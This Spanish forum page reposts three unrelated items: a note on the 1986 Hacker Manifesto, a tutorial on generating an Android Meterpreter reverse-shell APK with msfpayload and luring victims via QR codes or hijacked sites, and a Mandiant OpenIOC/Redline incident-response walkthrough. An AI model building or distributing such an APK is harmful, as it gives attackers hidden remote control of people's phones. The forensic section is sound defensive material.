El 8 de enero de 1986, Loyd Blankenship escribía el breve ensayo "The Conscience of a Hacker", también conocido como el "Manifiesto Hacker". Blankenship, un hacker en seguridad informática conocido por su seudónimo "The Mentor", escribió el manifiesto poco después de ser arrestado. El texto, publicado inicialmente en la revista online Phrack, con el tiempo pasó a formar parte de la cultura popular. Está presente en diversos sitios web, películas, entre las que se encuentra "Hackers" (1995) y videojuegos. El manifiesto, uno de los pilares de la cultura hacker y una fuente de inspiración para quienes se inician en actividades de esta índole, finaliza diciendo: "Sí, soy un criminal. Mi crimen es la curiosidad. Mi crimen es juzgar a las personas por lo que dicen y piensan y no por su apariencia. Mi crimen es ser más inteligente que ustedes, algo que nunca me perdonarán. Yo soy un hacker, y este es mi manifiesto. Ustedes pueden detener a este individuo, pero no podrán detenernos a todos... al fin y al cabo, somos todos iguales."

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En  seguridad cada día es más importante tener protegido nuestro Smartphone para no encontrarnos con sorpresas.Por lo tanto hoy quiero hablar de un payload de Metasploit que nos permite generar nuestro Payload y obtener un meterpreter para el control del dispositivo via comandos. Quiero explicar esto ya que es posible que alguien vea carteles con codigos QR que en el fondo quieran hacer uso de estas técnicas. Por otro lado el uso de este artículo fue para realizar un  estudio sobre los  terminales con  Android que dispongo y de ese modo  ver las opciones que me posibilitaba al instalar este meterpreter en el  móvil,  controlando por control remoto el mismo.

Imaginaros que en caso de perderle o robo tendría acceso a él también. Como he comentado esto es para estudio aunque en el caso que se utilice con malas intenciones un usuario mal intencionado se podría hacer con el control de miles de dispositivos.

Normalmente para este tipo de ataques se hace uso de la ingeniería social usando códigos QR  junto con un cartel o propaganda engañosa indicando que regalan  móviles o tablets. Aunque mucha gente no se fia de estos anuncios, aun son muchos los que lo descargan. Imaginar el caso de un cartel de cine con descuento en las entradas en la entrada del mismo. Aunque creamos mentira la gente descarga sin ningún problema y lo instala en su móvil. Este método tiene como fin engañar al usuario para que se descargue e instale la aplicación  y sin que el lo sepa en ese momento esta controlado por otro usuario.

Otra opción muy utilizada  por los malos es de hacerse con el control de servidores web que mediante javascript nos re-direccionan o abren nuevas ventanas donde está alojado el APK de modo que la aplicación nos solicite la instalación en el momento al abrirla con el móvil. Esto es posible indentificando el  user agent, el problema viene por que la gente confía en la página que está visitando y al abrirse desde la misma tambien confia en ella y esto provoca que se instale la aplicacion al confiar en el origen. Podemos hacer pruebas en nuestro  laboratorio de casa solo necesitamos metasploit que podemos encontrarlo en el a distribución de Kali.

Citar
$ msfupdate  — Actualizamos metasploit

Después de esto procederemos a crear nuestro payload para Android que se encuentra disponible en el framework de metasploit. Usaremos el msfpayload:

msfpayload android/meterpreter/reverse_tcp LHOST="La ip del servidor donde tenemos metasploit escuchando" R > blogtecnico.net.apk

LHOST=  es donde se añade la ip donde se conectara la APK al instalarse.

Con estos simples pasos ya disponemos de nuestra aplicación maliciosa para controlar un terminal móvil. Como he comentado antes es posible utilizar diversos medios para hacer que el usuario la descargue y aquí entra la astucia del hacker. Si os preguntáis como crear un código QR solo tenéis que cargar la aplicación SET y generar el código QR con la opción 9.

Por lo tanto quiero recomendar que no acepteis la instalacion de cualquier APK que os lo solicite si no confiais en el origen de la misma al igual que en el propiertario.

En security by Default crearon You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sobre su funcionamiento interno no perdais la oportunidad de leerlo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola lectores,

Quizá soy el último en hablar del You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  y a raíz de los comentarios de los maestros You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y mi queridísimo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y sin entrar en detalles dado que ellos lo han definido y comentado perfectamente, voy a dar una visión sobre 'como esta haciendo el Gobierno de EEUU para la detección de esta y otras intrusiones'.

El gobierno Americano dice que el informe MANDIANT y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es un  'pearl harbor' cibernético y el número de ordenadores y servidores comprometidos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y sitios gubernamentales es muy grande, para ello han tenido que pedir ayuda a agencias de investigación, empresas dedicadas al análisis forense y respuesta ante incidentes.

Un colega americano comentaba esta madrugada que lo descubierto hasta ahora, es mucho malware mejorado de lo antiguo y que los antivirus son testigos mudos de como la industria del malware vence una y otra vez. Que han encontrado sistemas de control remoto y aplicaciones que 'roban' documentos del tipo 'office' y que los laboratorios a día de hoy están 'a tope' de trabajo y que muchas muestras son idénticas en funcionamiento por lo que parece ser que se han basado en una arquitectura común en el método de infección de un ordenador.

También ha indicado, que dado que son muchos los analistas de distintas empresas los que están involucrados han empezado a aplicar múltiples indicadores de compromiso para evaluar el índice de penetración de los piratas analizando artefactos de Windows y la memoria RAM y virtual de los sistemas.

Efectivamente uno de los problemas que tenemos los equipos de investigadores, es que nos encontramos con muestras que muchas veces ya han sido analizados por otros compañeros y como no hay una comunicación fluida acabamos haciendo el trabajo dos veces. Los indicadores de compromiso, es una forma efectiva de tener (o no) una sospecha de un malware o proceso infectado.

Estos indicadores, son un sistema muy interesante y que a raíz del comentario de este colega quiero explicaros de que va. Para ello vamos a utilizar diversas utilidades de la empresa MANDIANT que por cierto colabora con el Presidente Obama para la detección de estos últimos incidentes que ha ocurrido.

MANDIANT

Hablar de la empresa You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es hablar del concepto Respuesta ante Incidentes y Forensics en estado puro. Mandiant, es una empresa de seguridad ubicada en Alexandria en Virginia y es creadora de múltiples herramientas comerciales y gratuitas. Muchas de ellas son buenas y potentes y porque no decirlo, me han salvado la vida en mas de una ocasión como ya habréis visto en diversos artículos de este blog.

Esta empresa viendo los incidentes de sus clientes en cuanto a intrusiones se refiere, diseñó un framework con objeto  de documentar las características técnicas que identifican a una amenaza conocida, la metodología que utiliza un atacante, o cualquier otra prueba de compromiso en un sistema o aplicación. A este framework le han llamado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que viene a decir Framework abierto de indicadores de compromiso.

OPENIOC

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login fue originalmente diseñado para permitir que sus productos pudieran de una forma  rápida e inteligente buscar potenciales fallos de seguridad y así lo integraron en toda su gama.  Con el paso del tiempo han liberado este framework en formato de código abierto que utiliza el esquema OpenIOC liberando herramientas y utilidades para permitir la comunicación de información.

Este framework permite preparar y agrupar de forma inteligente, (basado en los propios indicadores de compromisos de Mandiant) los ficheros, registros, servicios y procesos, haciendo eco en las posibles actuaciones de un atacante.

También si compartimos los indicadores de compromiso podemos detectar malware o algo inusual sin que tengamos que realizar un exhaustivo análisis forense de un sistema y trabajar dos veces en una muestra.

Veamos como funciona.

OpenIOC se compone de dos aplicaciones:


IOC_Finder: Esta utilidad recopila en diversos ficheros una auditoria completa del sistema sospechoso, basado en partes del registro, ficheros, servicios y procesos de la memoria. Una vez obtenido permite la generación de informes tan solo con cambiar un parámetro.

IOC_Editor (IOCe): Como su nombre indica es un editor gratuito para editar y crear los Indicadores de compromiso (IOCs). Estos son documentos XML que permiten ayudar a los analistas a capturar información diversa sobre las amenazas, incluidos los atributos de software malicioso en archivos, características de los cambios en el registro, los artefactos en la memoria, etc. IOCe proporciona una interfaz gráfica en la gestión de estos datos.

Ambos programas se pueden descargar desde la web OpenIOC en Mandiant You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

RECOPILANDO INFORMACIÓN.
Para ver el funcionamiento vamos a instalar un malware que simula ser una versión mejorada y troyanizada del informe APT1 y que ha sido descubierto por Brandon Dixon y publicado en la web de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.  Una vez ejecutado nos muestra la siguiente pantalla:



Tras poner la contraseña "hello" explota la vulnerabilidad modificada y mejorada del  'CVE-2011-2462' que salió en diciembre de 2011.

No voy a entrar en detalles de que hace el malware, para ello tenemos un extenso documento You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que explican el funcionamiento, ya que nuestra función es como aplicar indicadores ante un nuevo malware o intrusión.

Una vez que tenemos a mano las máquinas infectadas procedemos a utilizar las herramientas.

Para ello ejecutamos el siguiente comando:

C:\>mandiant_ioc_finder.exe collect

El cual empezará el proceso de obtención de datos. Esta ejecución durará posiblemente bastante rato (entre una o dos horas, dado que realiza un hash de todos los ficheros que está revisando), así que hay que armarse de paciencia. En diversos foros se cuenta como reducir el tiempo a cambio de quitar los hash, cosa imprescindible si lo que quieres es rapidez.


Obtención de datos

Una vez finalizado, el proceso habrá creado un directorio de nombre 'audits' que contiene un subdirectorio con el nombre de la máquina y que a su vez contiene unos 50 ficheros XML con los parámetros a utilizar. Este directorio es el resultado de unas veinte auditorias. De esta forma ya tenemos preparado lo que hay que revisar para poder pasar los indicadores de compromiso.



Bien en este punto vamos a aplicar los indicadores de compromiso que nos van a permitir detectar malware  o una intrusión aún cuando los antivirus no lo hagan, pero antes vamos a entrar de lleno en el indicador de compromiso.

IOC (INDICADOR DE COMPROMISO)

Como decía un indicador de compromiso es un fichero XML que contiene los parámetros que definen si hay o no un posible compromiso y con que valor se asigna en cuanto a su probabilidad.

La estructura de uno de ellos viene a ser así:

Estructura

Y para manejarnos de una forma mas cómoda podemos utilizar IOCe que es el editor de indicadores. Si abrimos un fichero '.ioc' con el editor lo vemos de esta forma:


AÑADIENDO MI INDICADOR DE COMPROMISO

Vamos a suponer que hemos detectado un patrón de compromiso que viene a decir lo siguiente:

    El atacante utiliza la cuenta: sip
    El dominio infectado es: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    El ejecutable 'dudoso' es: armada.tmp
    El proceso es: lsass.exe

Para ello vamos a utilizar IOCe que es el editor de Indicadores, una vez ejecutado nos vamos a nuevo y creamos un nuevo indicador, el resultado se vería tal que así:

Creación de un Indicador

Una vez que hemos cargado o creado indicadores de compromiso es hora de generar un informe en la máquina con los datos que anteriormente hemos obtenido.

INFORME DE SISTEMA COMPROMETIDO

Para ello vamos a ejecutar el siguiente comando:
C:\>mandiant_ioc_finder report -s ./audits -i c:\IOC -t html

En el que le decimos que genere un informe tomando como origen los ficheros XML de la carpeta 'audits' y tomando los indicadores de compromiso de la carpeta IOC. También el parámetro -t le indica que el resultado del informe esté creado en HTML.


Creación del informe

Una vez finalizado (también hay que armarse de paciencia) nos habrá generado un informe en el que podemos ver los procesos o ficheros que son sospechosos que coincide con algunos de nuestros IOC.


Resultado del informe

GENERANDO INDICADORES DE COMPROMISO CON REDLINE


La parte de informes la prefiero mostrar utilizando You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que además de ser otra herramienta de Mandiant, permite entre otras cosas analizar la memoria y mostrar qué proceso o fichero tiene más posibilidad de ser malware y cuál menos, contando puntos MRI (Malware Risk Index). Podríamos decir que es como Volatility pero con un entorno gráfico.

Otra de las ventajas es que permite crear un agente con objeto de llevarlo en un 'pendrive' o distribuirlo en un entorno de red y así obtener los resultados para posteriormente analizarlos. Permite crear IOCs o bien crear informes partiendo de ellos.

Lo mejor es verlo en un vídeo que he preparado a tal efecto, como podréis apreciar y tras cargar una sesión ya almacenada, Redline marca en color rojo los procesos de los que son sospechosos de malware, puntuando con un 98 el MRI.   A continuación creamos un informe basado en IOCs dando el origen de la carpeta que los contiene. Una vez cargado los IOCs abrimos el editor con objeto de ver el contenido del IOC y generamos el informe.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Vídeo del proceso de informes IOCs con Redline

Una vez finalizado podemos navegar en HTML por el proceso que ha sido detectado por el indicador de compromiso.

CONCLUSIONES

Hay que pensar que no es una herramienta 'al estilo' al que estamos acostumbrados en la detección de intrusiones, pero cumple todas las expectativas cuando se necesita analizar muchos sistemas en base a patrones. Yo lo definiría como un escaner forense en el que la comunidad (basándose en un estándar como OpenIOC) comparte sus patrones de búsqueda y que permite que un analista no haga el trabajo dos veces cuando otro lo ha realizado ya.

Evidentemente hecho en falta una automatización a la hora de desplegar agentes en grandes redes  y una gestión centralizada de estas, ya que de momento estos procesos son manuales. También hay que entender que Mandiant tiene su propia aplicación comercial (MIR) y que evidentemente no va a sacar un producto que compita consigo mismo.

No obstante con las aplicaciones que disponemos, un poco de imaginación mas la utilización de Active Directory con PowerShell, se puede llegar a un nivel de automatización mas que aceptable. El disponer de un sistema abierto como OpenIOC permitirá en un futuro disponer de herramientas que independientes del antivirus detecten patrones de ataque que estos no lo detectan.

La utilidad Redline es una gran herramienta a lo 'Volatility'  pero con las ventajas de un entorno gráfico, en la que destaco su paseo guiado o saber que es lo primero que tenemos que mirar. Redline calcula un "índice de malware de riesgo" que pone de relieve los procesos que merecen la pena investigar, vaya una joya la verdad.

Desde aquí os animo a que podáis empezar o seguir desarrollando con este apasionante tema de los Indicadores de compromiso.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login